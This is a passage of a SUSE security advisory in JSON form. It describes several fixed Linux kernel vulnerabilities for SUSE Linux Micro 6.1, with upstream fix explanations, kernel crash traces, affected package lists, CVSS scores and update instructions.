"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71087"
},
{
"cve": "CVE-2025-71088",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71088"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fallback earlier on simult connection\n\nSyzkaller reports a simult-connect race leading to inconsistent fallback\nstatus:\n\n WARNING: CPU: 3 PID: 33 at net/mptcp/subflow.c:1515 subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515\n Modules linked in:\n CPU: 3 UID: 0 PID: 33 Comm: ksoftirqd/3 Not tainted syzkaller #0 PREEMPT(full)\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\n RIP: 0010:subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515\n Code: 89 ee e8 78 61 3c f6 40 84 ed 75 21 e8 8e 66 3c f6 44 89 fe bf 07 00 00 00 e8 c1 61 3c f6 41 83 ff 07 74 09 e8 76 66 3c f6 90 \u003c0f\u003e 0b 90 e8 6d 66 3c f6 48 89 df e8 e5 ad ff ff 31 ff 89 c5 89 c6\n RSP: 0018:ffffc900006cf338 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: ffff888031acd100 RCX: ffffffff8b7f2abf\n RDX: ffff88801e6ea440 RSI: ffffffff8b7f2aca RDI: 0000000000000005\n RBP: 0000000000000000 R08: 0000000000000005 R09: 0000000000000007\n R10: 0000000000000004 R11: 0000000000002c10 R12: ffff88802ba69900\n R13: 1ffff920000d9e67 R14: ffff888046f81800 R15: 0000000000000004\n FS: 0000000000000000(0000) GS:ffff8880d69bc000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000560fc0ca1670 CR3: 0000000032c3a000 CR4: 0000000000352ef0\n Call Trace:\n \u003cTASK\u003e\n tcp_data_queue+0x13b0/0x4f90 net/ipv4/tcp_input.c:5197\n tcp_rcv_state_process+0xfdf/0x4ec0 net/ipv4/tcp_input.c:6922\n tcp_v6_do_rcv+0x492/0x1740 net/ipv6/tcp_ipv6.c:1672\n tcp_v6_rcv+0x2976/0x41e0 net/ipv6/tcp_ipv6.c:1918\n ip6_protocol_deliver_rcu+0x188/0x1520 net/ipv6/ip6_input.c:438\n ip6_input_finish+0x1e4/0x4b0 net/ipv6/ip6_input.c:489\n NF_HOOK include/linux/netfilter.h:318 [inline]\n NF_HOOK include/linux/netfilter.h:312 [inline]\n ip6_input+0x105/0x2f0 net/ipv6/ip6_input.c:500\n dst_input include/net/dst.h:471 [inline]\n ip6_rcv_finish net/ipv6/ip6_input.c:79 [inline]\n NF_HOOK include/linux/netfilter.h:318 [inline]\n NF_HOOK include/linux/netfilter.h:312 [inline]\n ipv6_rcv+0x264/0x650 net/ipv6/ip6_input.c:311\n __netif_receive_skb_one_core+0x12d/0x1e0 net/core/dev.c:5979\n __netif_receive_skb+0x1d/0x160 net/core/dev.c:6092\n process_backlog+0x442/0x15e0 net/core/dev.c:6444\n __napi_poll.constprop.0+0xba/0x550 net/core/dev.c:7494\n napi_poll net/core/dev.c:7557 [inline]\n net_rx_action+0xa9f/0xfe0 net/core/dev.c:7684\n handle_softirqs+0x216/0x8e0 kernel/softirq.c:579\n run_ksoftirqd kernel/softirq.c:968 [inline]\n run_ksoftirqd+0x3a/0x60 kernel/softirq.c:960\n smpboot_thread_fn+0x3f7/0xae0 kernel/smpboot.c:160\n kthread+0x3c2/0x780 kernel/kthread.c:463\n ret_from_fork+0x5d7/0x6f0 arch/x86/kernel/process.c:148\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nThe TCP subflow can process the simult-connect syn-ack packet after\ntransitioning to TCP_FIN1 state, bypassing the MPTCP fallback check,\nas the sk_state_change() callback is not invoked for * -\u003e FIN_WAIT1\ntransitions.\n\nThat will move the msk socket to an inconsistent status and the next\nincoming data will hit the reported splat.\n\nClose the race moving the simult-fallback check at the earliest possible\nstage - that is at syn-ack generation time.\n\nAbout the fixes tags: [2] was supposed to also fix this issue introduced\nby [3]. [1] is required as a dependence: it was not explicitly marked as\na fix, but it is one and it has already been backported before [3]. In\nother words, this commit should be backported up to [3], including [2]\nand [1] if that\u0027s not already there.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71088",
"url": "https://www.suse.com/security/cve/CVE-2025-71088"
},
{
"category": "external",
"summary": "SUSE Bug 1256630 for CVE-2025-71088",
"url": "https://bugzilla.suse.com/1256630"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71088"
},
{
"cve": "CVE-2025-71089",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71089"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niommu: disable SVA when CONFIG_X86 is set\n\nPatch series \"Fix stale IOTLB entries for kernel address space\", v7.\n\nThis proposes a fix for a security vulnerability related to IOMMU Shared\nVirtual Addressing (SVA). In an SVA context, an IOMMU can cache kernel\npage table entries. When a kernel page table page is freed and\nreallocated for another purpose, the IOMMU might still hold stale,\nincorrect entries. This can be exploited to cause a use-after-free or\nwrite-after-free condition, potentially leading to privilege escalation or\ndata corruption.\n\nThis solution introduces a deferred freeing mechanism for kernel page\ntable pages, which provides a safe window to notify the IOMMU to\ninvalidate its caches before the page is reused.\n\n\nThis patch (of 8):\n\nIn the IOMMU Shared Virtual Addressing (SVA) context, the IOMMU hardware\nshares and walks the CPU\u0027s page tables. The x86 architecture maps the\nkernel\u0027s virtual address space into the upper portion of every process\u0027s\npage table. Consequently, in an SVA context, the IOMMU hardware can walk\nand cache kernel page table entries.\n\nThe Linux kernel currently lacks a notification mechanism for kernel page\ntable changes, specifically when page table pages are freed and reused. \nThe IOMMU driver is only notified of changes to user virtual address\nmappings. This can cause the IOMMU\u0027s internal caches to retain stale\nentries for kernel VA.\n\nUse-After-Free (UAF) and Write-After-Free (WAF) conditions arise when\nkernel page table pages are freed and later reallocated. The IOMMU could\nmisinterpret the new data as valid page table entries. The IOMMU might\nthen walk into attacker-controlled memory, leading to arbitrary physical\nmemory DMA access or privilege escalation. This is also a\nWrite-After-Free issue, as the IOMMU will potentially continue to write\nAccessed and Dirty bits to the freed memory while attempting to walk the\nstale page tables.\n\nCurrently, SVA contexts are unprivileged and cannot access kernel\nmappings. However, the IOMMU will still walk kernel-only page tables all\nthe way down to the leaf entries, where it realizes the mapping is for the\nkernel and errors out. This means the IOMMU still caches these\nintermediate page table entries, making the described vulnerability a real\nconcern.\n\nDisable SVA on x86 architecture until the IOMMU can receive notification\nto flush the paging cache before freeing the CPU kernel page table pages.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71089",
"url": "https://www.suse.com/security/cve/CVE-2025-71089"
},
{
"category": "external",
"summary": "SUSE Bug 1256612 for CVE-2025-71089",
"url": "https://bugzilla.suse.com/1256612"
},
{
"category": "external",
"summary": "SUSE Bug 1256615 for CVE-2025-71089",
"url": "https://bugzilla.suse.com/1256615"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2025-71089"
},
{
"cve": "CVE-2025-71091",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71091"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nteam: fix check for port enabled in team_queue_override_port_prio_changed()\n\nThere has been a syzkaller bug reported recently with the following\ntrace:\n\nlist_del corruption, ffff888058bea080-\u003eprev is LIST_POISON2 (dead000000000122)\n------------[ cut here ]------------\nkernel BUG at lib/list_debug.c:59!\nOops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\nCPU: 3 UID: 0 PID: 21246 Comm: syz.0.2928 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nRIP: 0010:__list_del_entry_valid_or_report+0x13e/0x200 lib/list_debug.c:59\nCode: 48 c7 c7 e0 71 f0 8b e8 30 08 ef fc 90 0f 0b 48 89 ef e8 a5 02 55 fd 48 89 ea 48 89 de 48 c7 c7 40 72 f0 8b e8 13 08 ef fc 90 \u003c0f\u003e 0b 48 89 ef e8 88 02 55 fd 48 89 ea 48 b8 00 00 00 00 00 fc ff\nRSP: 0018:ffffc9000d49f370 EFLAGS: 00010286\nRAX: 000000000000004e RBX: ffff888058bea080 RCX: ffffc9002817d000\nRDX: 0000000000000000 RSI: ffffffff819becc6 RDI: 0000000000000005\nRBP: dead000000000122 R08: 0000000000000005 R09: 0000000000000000\nR10: 0000000080000000 R11: 0000000000000001 R12: ffff888039e9c230\nR13: ffff888058bea088 R14: ffff888058bea080 R15: ffff888055461480\nFS: 00007fbbcfe6f6c0(0000) GS:ffff8880d6d0a000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 000000110c3afcb0 CR3: 00000000382c7000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n __list_del_entry_valid include/linux/list.h:132 [inline]\n __list_del_entry include/linux/list.h:223 [inline]\n list_del_rcu include/linux/rculist.h:178 [inline]\n __team_queue_override_port_del drivers/net/team/team_core.c:826 [inline]\n __team_queue_override_port_del drivers/net/team/team_core.c:821 [inline]\n team_queue_override_port_prio_changed drivers/net/team/team_core.c:883 [inline]\n team_priority_option_set+0x171/0x2f0 drivers/net/team/team_core.c:1534\n team_option_set drivers/net/team/team_core.c:376 [inline]\n team_nl_options_set_doit+0x8ae/0xe60 drivers/net/team/team_core.c:2653\n genl_family_rcv_msg_doit+0x209/0x2f0 net/netlink/genetlink.c:1115\n genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline]\n genl_rcv_msg+0x55c/0x800 net/netlink/genetlink.c:1210\n netlink_rcv_skb+0x158/0x420 net/netlink/af_netlink.c:2552\n genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219\n netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]\n netlink_unicast+0x5aa/0x870 net/netlink/af_netlink.c:1346\n netlink_sendmsg+0x8c8/0xdd0 net/netlink/af_netlink.c:1896\n sock_sendmsg_nosec net/socket.c:727 [inline]\n __sock_sendmsg net/socket.c:742 [inline]\n ____sys_sendmsg+0xa98/0xc70 net/socket.c:2630\n ___sys_sendmsg+0x134/0x1d0 net/socket.c:2684\n __sys_sendmsg+0x16d/0x220 net/socket.c:2716\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xcd/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nThe problem is in this flow:\n1) Port is enabled, queue_id != 0, in qom_list\n2) Port gets disabled\n -\u003e team_port_disable()\n -\u003e team_queue_override_port_del()\n -\u003e del (removed from list)\n3) Port is disabled, queue_id != 0, not in any list\n4) Priority changes\n -\u003e team_queue_override_port_prio_changed()\n -\u003e checks: port disabled \u0026\u0026 queue_id != 0\n -\u003e calls del - hits the BUG as it is removed already\n\nTo fix this, change the check in team_queue_override_port_prio_changed()\nso it returns early if port is not enabled.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71091",
"url": "https://www.suse.com/security/cve/CVE-2025-71091"
},
{
"category": "external",
"summary": "SUSE Bug 1256773 for CVE-2025-71091",
"url": "https://bugzilla.suse.com/1256773"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71091"
},
{
"cve": "CVE-2025-71093",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71093"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ne1000: fix OOB in e1000_tbi_should_accept()\n\nIn e1000_tbi_should_accept() we read the last byte of the frame via\n\u0027data[length - 1]\u0027 to evaluate the TBI workaround. If the descriptor-\nreported length is zero or larger than the actual RX buffer size, this\nread goes out of bounds and can hit unrelated slab objects. The issue\nis observed from the NAPI receive path (e1000_clean_rx_irq):\n\n==================================================================\nBUG: KASAN: slab-out-of-bounds in e1000_tbi_should_accept+0x610/0x790\nRead of size 1 at addr ffff888014114e54 by task sshd/363\n\nCPU: 0 PID: 363 Comm: sshd Not tainted 5.18.0-rc1 #1\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014\nCall Trace:\n \u003cIRQ\u003e\n dump_stack_lvl+0x5a/0x74\n print_address_description+0x7b/0x440\n print_report+0x101/0x200\n kasan_report+0xc1/0xf0\n e1000_tbi_should_accept+0x610/0x790\n e1000_clean_rx_irq+0xa8c/0x1110\n e1000_clean+0xde2/0x3c10\n __napi_poll+0x98/0x380\n net_rx_action+0x491/0xa20\n __do_softirq+0x2c9/0x61d\n do_softirq+0xd1/0x120\n \u003c/IRQ\u003e\n \u003cTASK\u003e\n __local_bh_enable_ip+0xfe/0x130\n ip_finish_output2+0x7d5/0xb00\n __ip_queue_xmit+0xe24/0x1ab0\n __tcp_transmit_skb+0x1bcb/0x3340\n tcp_write_xmit+0x175d/0x6bd0\n __tcp_push_pending_frames+0x7b/0x280\n tcp_sendmsg_locked+0x2e4f/0x32d0\n tcp_sendmsg+0x24/0x40\n sock_write_iter+0x322/0x430\n vfs_write+0x56c/0xa60\n ksys_write+0xd1/0x190\n do_syscall_64+0x43/0x90\n entry_SYSCALL_64_after_hwframe+0x44/0xae\nRIP: 0033:0x7f511b476b10\nCode: 73 01 c3 48 8b 0d 88 d3 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 0f 1f 44 00 00 83 3d f9 2b 2c 00 00 75 10 b8 01 00 00 00 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 8e 9b 01 00 48 89 04 24\nRSP: 002b:00007ffc9211d4e8 EFLAGS: 00000246 ORIG_RAX: 0000000000000001\nRAX: ffffffffffffffda RBX: 0000000000004024 RCX: 00007f511b476b10\nRDX: 0000000000004024 RSI: 0000559a9385962c RDI: 0000000000000003\nRBP: 0000559a9383a400 R08: fffffffffffffff0 R09: 0000000000004f00\nR10: 0000000000000070 R11: 0000000000000246 R12: 0000000000000000\nR13: 00007ffc9211d57f R14: 0000559a9347bde7 R15: 0000000000000003\n \u003c/TASK\u003e\nAllocated by task 1:\n __kasan_krealloc+0x131/0x1c0\n krealloc+0x90/0xc0\n add_sysfs_param+0xcb/0x8a0\n 